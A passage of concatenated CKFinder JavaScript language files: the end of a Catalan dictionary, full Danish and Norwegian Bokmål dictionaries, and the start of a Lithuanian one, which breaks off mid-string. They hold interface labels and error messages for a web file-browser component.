SelectThumbnail : 'Seleccionar la icona', View : 'Veure', Download : 'Descarregar', NewSubFolder : 'Nova Subcarpeta', Rename : 'Canviar el nom', Delete : 'Esborrar', DeleteFiles : 'Esborrar Fitxers', CopyDragDrop : 'Copiar aquí', MoveDragDrop : 'Moure aquí', // Dialogs RenameDlgTitle : 'Canviar el nom', NewNameDlgTitle : 'Nou nom', FileExistsDlgTitle : 'Fitxer existent', SysErrorDlgTitle : 'Error de sistema', FileOverwrite : 'Sobreescriure', FileAutorename : 'Auto-renombrar', ManuallyRename : 'Renombrar manualment', // Generic OkBtn : 'Acceptar', CancelBtn : 'Cancel·lar', CloseBtn : 'Tancar', // Upload Panel UploadTitle : 'Afegir nou fitxer', UploadSelectLbl : 'Triar el fitxer a pujar', UploadProgressLbl : '(Pujada en progrés, si us plau esperi...)', UploadBtn : 'Pujar el fitxer escollit', UploadBtnCancel : 'Cancel·lar', UploadNoFileMsg : 'Si us plau, escull un fitxer del teu ordinador.', UploadNoFolder : 'Si us plau, escull la carpeta abans d\'iniciar la pujada.', UploadNoPerms : 'No pot pujar fitxers.', UploadUnknError : 'Error enviant el fitxer.', UploadExtIncorrect : 'La extensió del fitxer no està permesa en aquesta carpeta.', // Flash Uploads UploadLabel : 'Fitxers a pujar', UploadTotalFiles : 'Total de fitxers:', UploadTotalSize : 'Grandària total:', UploadSend : 'Afegir', UploadAddFiles : 'Afegir fitxers', UploadClearFiles : 'Esborrar fitxers', UploadCancel : 'Cancel·lar la pujada', UploadRemove : 'Treure', UploadRemoveTip : 'Treure !f', UploadUploaded : 'Enviat !n%', UploadProcessing : 'Processant...', // Settings Panel SetTitle : 'Configuració', SetView : 'Vista:', SetViewThumb : 'Icones', SetViewList : 'Llista', SetDisplay : 'Mostrar:', SetDisplayName : 'Nom del fitxer', SetDisplayDate : 'Data', SetDisplaySize : 'Grandària del fitxer', SetSort : 'Ordenar:', SetSortName : 'per Nom', SetSortDate : 'per Data', SetSortSize : 'per Grandària', SetSortExtension : 'per Extensió', // Status Bar FilesCountEmpty : '<Carpeta buida>', FilesCountOne : '1 fitxer', FilesCountMany : '%1 fitxers', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'No ha estat possible completar la solicitut. (Error %1)', Errors : { 10 : 'Ordre incorrecte.', 11 : 'El tipus de recurs no ha estat especificat a la solicitut.', 12 : 'El tipus de recurs solicitat no és vàlid.', 102 : 'Nom de fitxer o carpeta no vàlids.', 103 : 'No s\'ha pogut completar la solicitut degut a les restriccions d\'autorització.', 104 : 'No s\'ha pogut completar la solicitut degut a les restriccions en el sistema de fitxers.', 105 : 'La extensió del fitxer no es vàlida.', 109 : 'Petició invàlida.', 110 : 'Error desconegut.', 111 : 'No ha estat possible completar l\'operació a causa de la grandària del fitxer resultant.', 115 : 'Ja existeix un fitxer o carpeta amb aquest nom.', 116 : 'No s\'ha trobat la carpeta. Si us plau, actualitzi i torni-ho a provar.', 117 : 'No s\'ha trobat el fitxer. Si us plau, actualitzi i torni-ho a provar.', 118 : 'Les rutes origen i destí són iguals.', 201 : 'Ja existeix un fitxer amb aquest nom. El fitxer pujat ha estat renombrat com a "%1".', 202 : 'Fitxer invàlid.', 203 : 'Fitxer invàlid. El pes és massa gran.', 204 : 'El fitxer pujat està corrupte.', 205 : 'La carpeta temporal no està disponible en el servidor per poder realitzar pujades.', 206 : 'La pujada s\'ha cancel·lat per raons de seguretat. El fitxer conté codi HTML.', 207 : 'El fitxer pujat ha estat renombrat com a "%1".', 300 : 'Ha fallat el moure el(s) fitxer(s).', 301 : 'Ha fallat el copiar el(s) fitxer(s).', 500 : 'El navegador de fitxers està deshabilitat per raons de seguretat. Si us plau, contacti amb l\'administrador del sistema i comprovi el fitxer de configuració de CKFinder.', 501 : 'El suport per a icones està deshabilitat.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'El nom del fitxer no pot estar buit.', FileExists : 'El fitxer %s ja existeix.', FolderEmpty : 'El nom de la carpeta no pot estar buit.', FolderExists : 'La carpeta %s ja existeix.', FolderNameExists : 'La carpeta ja existeix.', FileInvChar : 'El nom del fitxer no pot contenir cap dels caràcters següents: \n\\ / : * ? " < > |', FolderInvChar : 'El nom de la carpeta no pot contenir cap dels caràcters següents: \n\\ / : * ? " < > |', PopupBlockView : 'No ha estat possible obrir el fitxer en una nova finestra. Si us plau, configuri el seu navegador i desactivi tots els blocadors de finestres per a aquesta pàgina.', XmlError : 'No ha estat possible carregar correctament la resposta XML del servidor.', XmlEmpty : 'No ha estat possible carregar correctament la resposta XML del servidor. El servidor ha enviat una cadena buida.', XmlRawResponse : 'Resposta del servidor: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Redimensionar %s', sizeTooBig : 'No es pot posar l\'altura o l\'amplada de la imatge més gran que les dimensions originals (%size).', resizeSuccess : 'Imatge redimensionada correctament.', thumbnailNew : 'Crear nova miniatura', thumbnailSmall : 'Petita (%s)', thumbnailMedium : 'Mitjana (%s)', thumbnailLarge : 'Gran (%s)', newSize : 'Establir nova grandària', width : 'Amplada', height : 'Altura', invalidHeight : 'Altura invàlida.', invalidWidth : 'Amplada invàlida.', invalidName : 'Nom no vàlid.', newImage : 'Crear nova imatge', noExtensionChange : 'L\'extensió no es pot canviar.', imageSmall : 'La imatge original és massa petita.', contextMenuName : 'Redimensionar', lockRatio : 'Proporcional', resetSize : 'Grandària Original' }, // Fileeditor plugin Fileeditor : { save : 'Desar', fileOpenError : 'No es pot obrir el fitxero.', fileSaveSuccess : 'Fitxer desat correctament.', contextMenuName : 'Editar', loadingFile : 'Carregant fitxer, si us plau, esperi...' }, Maximize : { maximize : 'Maximitzar', minimize : 'Minimitzar' }, Gallery : { current : 'Imatge {current} de {total}' }, Zip : { extractHereLabel : 'Extreure aquí', extractToLabel : 'Extreure a...', downloadZipLabel : 'Descarregar en zip', compressZipLabel : 'Comprimir en zip', removeAndExtract : 'Eliminar els existents i extreure', extractAndOverwrite : 'Extreure sobreescrivint els fitxers existents', extractSuccess : 'Fitxer extret correctament.' } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Danish * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['da'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, ikke tilgængelig</span>', confirmCancel : 'Nogle af indstillingerne er blevet ændret. Er du sikker på at lukke dialogen?', ok : 'OK', cancel : 'Annuller', confirmationTitle : 'Bekræftelse', messageTitle : 'Information', inputTitle : 'Spørgsmål', undo : 'Fortryd', redo : 'Annuller fortryd', skip : 'Skip', skipAll : 'Skip alle', makeDecision : 'Hvad skal der foretages?', rememberDecision: 'Husk denne indstilling' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'da', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd-mm-yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Mapper', FolderLoading : 'Indlæser...', FolderNew : 'Skriv navnet på den nye mappe: ', FolderRename : 'Skriv det nye navn på mappen: ', FolderDelete : 'Er du sikker på, at du vil slette mappen "%1"?', FolderRenaming : ' (Omdøber...)', FolderDeleting : ' (Sletter...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Skriv navnet på den nye fil: ', FileRenameExt : 'Er du sikker på, at du vil ændre filtypen? Filen kan muligvis ikke bruges bagefter.', FileRenaming : '(Omdøber...)', FileDelete : 'Er du sikker på, at du vil slette filen "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Indlæser...', FilesEmpty : 'Tom mappe', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Kurv', BasketClear : 'Tøm kurv', BasketRemove : 'Fjern fra kurv', BasketOpenFolder : 'Åben overordnet mappe', BasketTruncateConfirm : 'Er du sikker på at du vil tømme kurven?', BasketRemoveConfirm : 'Er du sikker på at du vil slette filen "%1" fra kurven?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Ingen filer i kurven, brug musen til at trække filer til kurven.', BasketCopyFilesHere : 'Kopier Filer fra kurven', BasketMoveFilesHere : 'Flyt Filer fra kurven', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Upload', UploadTip : 'Upload ny fil', Refresh : 'Opdatér', Settings : 'Indstillinger', Help : 'Hjælp', HelpTip : 'Hjælp', // Context Menus Select : 'Vælg', SelectThumbnail : 'Vælg thumbnail', View : 'Vis', Download : 'Download', NewSubFolder : 'Ny undermappe', Rename : 'Omdøb', Delete : 'Slet', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopier hertil', MoveDragDrop : 'Flyt hertil', // Dialogs RenameDlgTitle : 'Omdøb', NewNameDlgTitle : 'Nyt navn', FileExistsDlgTitle : 'Filen eksisterer allerede', SysErrorDlgTitle : 'System fejl', FileOverwrite : 'Overskriv', FileAutorename : 'Auto-omdøb', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Annullér', CloseBtn : 'Luk', // Upload Panel UploadTitle : 'Upload ny fil', UploadSelectLbl : 'Vælg den fil, som du vil uploade', UploadProgressLbl : '(Uploader, vent venligst...)', UploadBtn : 'Upload filen', UploadBtnCancel : 'Annuller', UploadNoFileMsg : 'Vælg en fil på din computer.', UploadNoFolder : 'Venligst vælg en mappe før upload startes.', UploadNoPerms : 'Upload er ikke tilladt.', UploadUnknError : 'Fejl ved upload.', UploadExtIncorrect : 'Denne filtype er ikke tilladt i denne mappe.', // Flash Uploads UploadLabel : 'Files to Upload', UploadTotalFiles : 'Total antal filer:', UploadTotalSize : 'Total størrelse:', UploadSend : 'Upload', UploadAddFiles : 'Tilføj filer', UploadClearFiles : 'Nulstil filer', UploadCancel : 'Annuller upload', UploadRemove : 'Fjern', UploadRemoveTip : 'Fjern !f', UploadUploaded : 'Uploadede !n%', UploadProcessing : 'Udfører...', // Settings Panel SetTitle : 'Indstillinger', SetView : 'Vis:', SetViewThumb : 'Thumbnails', SetViewList : 'Liste', SetDisplay : 'Thumbnails:', SetDisplayName : 'Filnavn', SetDisplayDate : 'Dato', SetDisplaySize : 'Størrelse', SetSort : 'Sortering:', SetSortName : 'efter filnavn', SetSortDate : 'efter dato', SetSortSize : 'efter størrelse', SetSortExtension : 'efter filtype', // Status Bar FilesCountEmpty : '<tom mappe>', FilesCountOne : '1 fil', FilesCountMany : '%1 filer', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Det var ikke muligt at fuldføre handlingen. (Fejl: %1)', Errors : { 10 : 'Ugyldig handling.', 11 : 'Ressourcetypen blev ikke angivet i anmodningen.', 12 : 'Ressourcetypen er ikke gyldig.', 102 : 'Ugyldig fil eller mappenavn.', 103 : 'Det var ikke muligt at fuldføre handlingen på grund af en begrænsning i rettigheder.', 104 : 'Det var ikke muligt at fuldføre handlingen på grund af en begrænsning i filsystem rettigheder.', 105 : 'Ugyldig filtype.', 109 : 'Ugyldig anmodning.', 110 : 'Ukendt fejl.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'En fil eller mappe med det samme navn eksisterer allerede.', 116 : 'Mappen blev ikke fundet. Opdatér listen eller prøv igen.', 117 : 'Filen blev ikke fundet. Opdatér listen eller prøv igen.', 118 : 'Originalplacering og destination er ens.', 201 : 'En fil med det samme filnavn eksisterer allerede. Den uploadede fil er blevet omdøbt til "%1".', 202 : 'Ugyldig fil.', 203 : 'Ugyldig fil. Filstørrelsen er for stor.', 204 : 'Den uploadede fil er korrupt.', 205 : 'Der er ikke en midlertidig mappe til upload til rådighed på serveren.', 206 : 'Upload annulleret af sikkerhedsmæssige årsager. Filen indeholder HTML-lignende data.', 207 : 'Den uploadede fil er blevet omdøbt til "%1".', 300 : 'Flytning af fil(er) fejlede.', 301 : 'Kopiering af fil(er) fejlede.', 500 : 'Filbrowseren er deaktiveret af sikkerhedsmæssige årsager. Kontakt systemadministratoren eller kontrollér CKFinders konfigurationsfil.', 501 : 'Understøttelse af thumbnails er deaktiveret.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Filnavnet må ikke være tomt.', FileExists : 'Fil %erne eksisterer allerede.', FolderEmpty : 'Mappenavnet må ikke være tomt.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Filnavnet må ikke indeholde et af følgende tegn: \n\\ / : * ? " < > |', FolderInvChar : 'Mappenavnet må ikke indeholde et af følgende tegn: \n\\ / : * ? " < > |', PopupBlockView : 'Det var ikke muligt at åbne filen i et nyt vindue. Kontrollér konfigurationen i din browser, og deaktivér eventuelle popup-blokkere for denne hjemmeside.', XmlError : 'Det var ikke muligt at hente den korrekte XML kode fra serveren.', XmlEmpty : 'Det var ikke muligt at hente den korrekte XML kode fra serveren. Serveren returnerede et tomt svar.', XmlRawResponse : 'Serveren returenede følgende output: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Rediger størrelse %s', sizeTooBig : 'Kan ikke ændre billedets højde eller bredde til en værdi større end dets originale størrelse (%size).', resizeSuccess : 'Størrelsen er nu ændret.', thumbnailNew : 'Opret ny thumbnail', thumbnailSmall : 'Lille (%s)', thumbnailMedium : 'Mellem (%s)', thumbnailLarge : 'Stor (%s)', newSize : 'Rediger størrelse', width : 'Bredde', height : 'Højde', invalidHeight : 'Ugyldig højde.', invalidWidth : 'Ugyldig bredde.', invalidName : 'Ugyldigt filenavn.', newImage : 'Opret nyt billede.', noExtensionChange : 'Filtypen kan ikke ændres.', imageSmall : 'Originalfilen er for lille.', contextMenuName : 'Rediger størrelse', lockRatio : 'Lås størrelsesforhold', resetSize : 'Nulstil størrelse' }, // Fileeditor plugin Fileeditor : { save : 'Gem', fileOpenError : 'Filen kan ikke åbnes.', fileSaveSuccess : 'Filen er nu gemt.', contextMenuName : 'Rediger', loadingFile : 'Henter fil, vent venligst...' }, Maximize : { maximize : 'Maximér', minimize : 'Minimér' }, Gallery : { current : 'Billede {current} ud af {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Norwegian * Bokmål language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['nb'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, utilgjenglig</span>', confirmCancel : 'Noen av valgene har blitt endret. Er du sikker på at du vil lukke dialogen?', ok : 'OK', cancel : 'Avbryt', confirmationTitle : 'Bekreftelse', messageTitle : 'Informasjon', inputTitle : 'Spørsmål', undo : 'Angre', redo : 'Gjør om', skip : 'Hopp over', skipAll : 'Hopp over alle', makeDecision : 'Hvilken handling skal utføres?', rememberDecision: 'Husk mitt valg' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'nb', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Mapper', FolderLoading : 'Laster...', FolderNew : 'Skriv inn det nye mappenavnet: ', FolderRename : 'Skriv inn det nye mappenavnet: ', FolderDelete : 'Er du sikker på at du vil slette mappen "%1"?', FolderRenaming : ' (Endrer mappenavn...)', FolderDeleting : ' (Sletter...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Skriv inn det nye filnavnet: ', FileRenameExt : 'Er du sikker på at du vil endre filtypen? Filen kan bli ubrukelig.', FileRenaming : 'Endrer filnavn...', FileDelete : 'Er du sikker på at du vil slette denne filen "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Laster...', FilesEmpty : 'Denne katalogen er tom.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Kurv', BasketClear : 'Tøm kurv', BasketRemove : 'Fjern fra kurv', BasketOpenFolder : 'Åpne foreldremappen', BasketTruncateConfirm : 'Vil du virkelig fjerne alle filer fra kurven?', BasketRemoveConfirm : 'Vil du virkelig fjerne filen "%1" fra kurven?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Ingen filer i kurven, dra og slipp noen.', BasketCopyFilesHere : 'Kopier filer fra kurven', BasketMoveFilesHere : 'Flytt filer fra kurven', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Last opp', UploadTip : 'Last opp en ny fil', Refresh : 'Oppdater', Settings : 'Innstillinger', Help : 'Hjelp', HelpTip : 'Hjelp finnes kun på engelsk', // Context Menus Select : 'Velg', SelectThumbnail : 'Velg miniatyr', View : 'Vis fullversjon', Download : 'Last ned', NewSubFolder : 'Ny undermappe', Rename : 'Endre navn', Delete : 'Slett', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopier hit', MoveDragDrop : 'Flytt hit', // Dialogs RenameDlgTitle : 'Gi nytt navn', NewNameDlgTitle : 'Nytt navn', FileExistsDlgTitle : 'Filen finnes allerede', SysErrorDlgTitle : 'Systemfeil', FileOverwrite : 'Overskriv', FileAutorename : 'Gi nytt navn automatisk', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Avbryt', CloseBtn : 'Lukk', // Upload Panel UploadTitle : 'Last opp ny fil', UploadSelectLbl : 'Velg filen du vil laste opp', UploadProgressLbl : '(Laster opp filen, vennligst vent...)', UploadBtn : 'Last opp valgt fil', UploadBtnCancel : 'Avbryt', UploadNoFileMsg : 'Du må velge en fil fra din datamaskin', UploadNoFolder : 'Vennligst velg en mappe før du laster opp.', UploadNoPerms : 'Filopplastning er ikke tillatt.', UploadUnknError : 'Feil ved sending av fil.', UploadExtIncorrect : 'Filtypen er ikke tillatt i denne mappen.', // Flash Uploads UploadLabel : 'Filer for opplastning', UploadTotalFiles : 'Totalt antall filer:', UploadTotalSize : 'Total størrelse:', UploadSend : 'Last opp', UploadAddFiles : 'Legg til filer', UploadClearFiles : 'Tøm filer', UploadCancel : 'Avbryt opplastning', UploadRemove : 'Fjern', UploadRemoveTip : 'Fjern !f', UploadUploaded : 'Lastet opp !n%', UploadProcessing : 'Behandler...', // Settings Panel SetTitle : 'Innstillinger', SetView : 'Filvisning:', SetViewThumb : 'Miniatyrbilder', SetViewList : 'Liste', SetDisplay : 'Vis:', SetDisplayName : 'Filnavn', SetDisplayDate : 'Dato', SetDisplaySize : 'Filstørrelse', SetSort : 'Sorter etter:', SetSortName : 'Filnavn', SetSortDate : 'Dato', SetSortSize : 'Størrelse', SetSortExtension : 'Filetternavn', // Status Bar FilesCountEmpty : '<Tom Mappe>', FilesCountOne : '1 fil', FilesCountMany : '%1 filer', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Det var ikke mulig å utføre forespørselen. (Feil %1)', Errors : { 10 : 'Ugyldig kommando.', 11 : 'Ressurstypen ble ikke spesifisert i forepørselen.', 12 : 'Ugyldig ressurstype.', 102 : 'Ugyldig fil- eller mappenavn.', 103 : 'Kunne ikke utføre forespørselen pga manglende autorisasjon.', 104 : 'Kunne ikke utføre forespørselen pga manglende tilgang til filsystemet.', 105 : 'Ugyldig filtype.', 109 : 'Ugyldig forespørsel.', 110 : 'Ukjent feil.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Det finnes allerede en fil eller mappe med dette navnet.', 116 : 'Kunne ikke finne mappen. Oppdater vinduet og prøv igjen.', 117 : 'Kunne ikke finne filen. Oppdater vinduet og prøv igjen.', 118 : 'Kilde- og mål-bane er like.', 201 : 'Det fantes allerede en fil med dette navnet. Den opplastede filens navn har blitt endret til "%1".', 202 : 'Ugyldig fil.', 203 : 'Ugyldig fil. Filen er for stor.', 204 : 'Den opplastede filen er korrupt.', 205 : 'Det finnes ingen midlertidig mappe for filopplastinger.', 206 : 'Opplastingen ble avbrutt av sikkerhetshensyn. Filen inneholder HTML-aktig data.', 207 : 'Den opplastede filens navn har blitt endret til "%1".', 300 : 'Klarte ikke å flytte fil(er).', 301 : 'Klarte ikke å kopiere fil(er).', 500 : 'Filvelgeren ikke tilgjengelig av sikkerhetshensyn. Kontakt systemansvarlig og be han sjekke CKFinder\'s konfigurasjonsfil.', 501 : 'Funksjon for minityrbilder er skrudd av.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Filnavnet kan ikke være tomt.', FileExists : 'Filen %s finnes alt.', FolderEmpty : 'Mappenavnet kan ikke være tomt.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Filnavnet kan ikke inneholde følgende tegn: \n\\ / : * ? " < > |', FolderInvChar : 'Mappenavnet kan ikke inneholde følgende tegn: \n\\ / : * ? " < > |', PopupBlockView : 'Du må skru av popup-blockeren for å se bildet i nytt vindu.', XmlError : 'Det var ikke mulig å laste XML-dataene i svaret fra serveren.', XmlEmpty : 'Det var ikke mulig å laste XML-dataene fra serverne, svaret var tomt.', XmlRawResponse : 'Rått datasvar fra serveren: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Endre størrelse %s', sizeTooBig : 'Kan ikke sette høyde og bredde til større enn orginalstørrelse (%size).', resizeSuccess : 'Endring av bildestørrelse var vellykket.', thumbnailNew : 'Lag ett nytt miniatyrbilde', thumbnailSmall : 'Liten (%s)', thumbnailMedium : 'Medium (%s)', thumbnailLarge : 'Stor (%s)', newSize : 'Sett en ny størrelse', width : 'Bredde', height : 'Høyde', invalidHeight : 'Ugyldig høyde.', invalidWidth : 'Ugyldig bredde.', invalidName : 'Ugyldig filnavn.', newImage : 'Lag ett nytt bilde', noExtensionChange : 'Filendelsen kan ikke endres.', imageSmall : 'Kildebildet er for lite.', contextMenuName : 'Endre størrelse', lockRatio : 'Lås forhold', resetSize : 'Tilbakestill størrelse' }, // Fileeditor plugin Fileeditor : { save : 'Lagre', fileOpenError : 'Klarte ikke å åpne filen.', fileSaveSuccess : 'Fillagring var vellykket.', contextMenuName : 'Rediger', loadingFile : 'Laster fil, vennligst vent...' }, Maximize : { maximize : 'Maksimer', minimize : 'Minimer' }, Gallery : { current : 'Bilde {current} av {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Lithuanian * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['lt'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, nėra</span>', confirmCancel : 'Kai kurie nustatymai buvo pakeisti. Ar tikrai norite uždaryti šį langą?', ok : 'Gerai', cancel : 'Atšaukti', confirmationTitle : 'Patvirtinimas', messageTitle : 'Informacija', inputTitle : 'Klausimas', undo : 'Veiksmas atgal', redo : 'Veiksmas pirmyn', skip : 'Praleisti', skipAll : 'Praleisti viską', makeDecision : 'Ką pasirinksite?', rememberDecision: 'Atsiminti mano pasirinkimą' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'lt', LangCode : 'lt', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'yyyy.mm.dd H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Segtuvai', FolderLoading : 'Prašau palaukite...', FolderNew : 'Prašau įrašykite naujo segtuvo pavadinimą: ', FolderRename : 'Prašau įrašykite naujo segtuvo pavadinimą: ', FolderDelete : 'Ar tikrai norite ištrinti "%1" segtuvą?', FolderRenaming : ' (Pervadinama...)', FolderDeleting : ' (Trinama...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Prašau įrašykite naujo failo pavadinimą: ', FileRenameExt : 'Ar tikrai norite pakeisti šio failo plėtinį? Failas gali būti nebepanaudojamas', FileRenaming : 'Pervadinama...', FileDelete : 'Ar tikrai norite ištrinti failą "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Prašau palaukite...', FilesEmpty : 'Tuščias segtuvas', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Krepšelis', BasketClear : 'Ištuštinti krepšelį', BasketRemove : 'Ištrinti krepšelį', BasketOpenFolder : 'Atidaryti failo segtuvą', BasketTruncateConfirm : 'Ar tikrai norite ištrinti visus failus iš krepšelio?', BasketRemoveConfirm : 'Ar tikrai norite ištrinti failą "%1" iš krepšelio?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Krepšelyje failų nėra, nuvilkite ir įmeskite juos į krepšelį.', BasketCopyFilesHere : 'Kopijuoti failus iš krepšelio', BasketMoveFilesHere : 'Perkelti failus iš krepšelio', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Įkelti', UploadTip : 'Įkelti naują failą', Refresh : 'Atnaujinti', Settings : 'Nustatymai', Help : 'Pagalba', HelpTip : 'Patarimai', // Context Menus Select : 'Pasirinkti', SelectThumbnail : 'Pasirinkti miniatiūrą', View : 'Peržiūrėti', Download : 'Atsisiųsti', NewSubFolder : 'Naujas segtuvas', Rename : 'Pervadinti', Delete : 'Ištrinti', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Nukopijuoti čia', MoveDragDrop : 'Perkelti čia', // Dialogs RenameDlgTitle : 'Pervadinti', NewNameDlgTitle : 'Naujas pavadinimas', FileExistsDlgTitle : 'Toks failas jau egzistuoja', SysErrorDlgTitle : 'Sistemos klaida', FileOverwrite : 'Užrašyti ant viršaus', FileAutorename : 'Automatiškai pervadinti', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'Gerai', CancelBtn : 'Atšaukti', CloseBtn : 'Uždaryti', // Upload Panel UploadTitle : 'Įkelti naują failą', UploadSelectLbl : 'Pasirinkite failą įkėlimui', UploadProgressLbl : '(Vykdomas 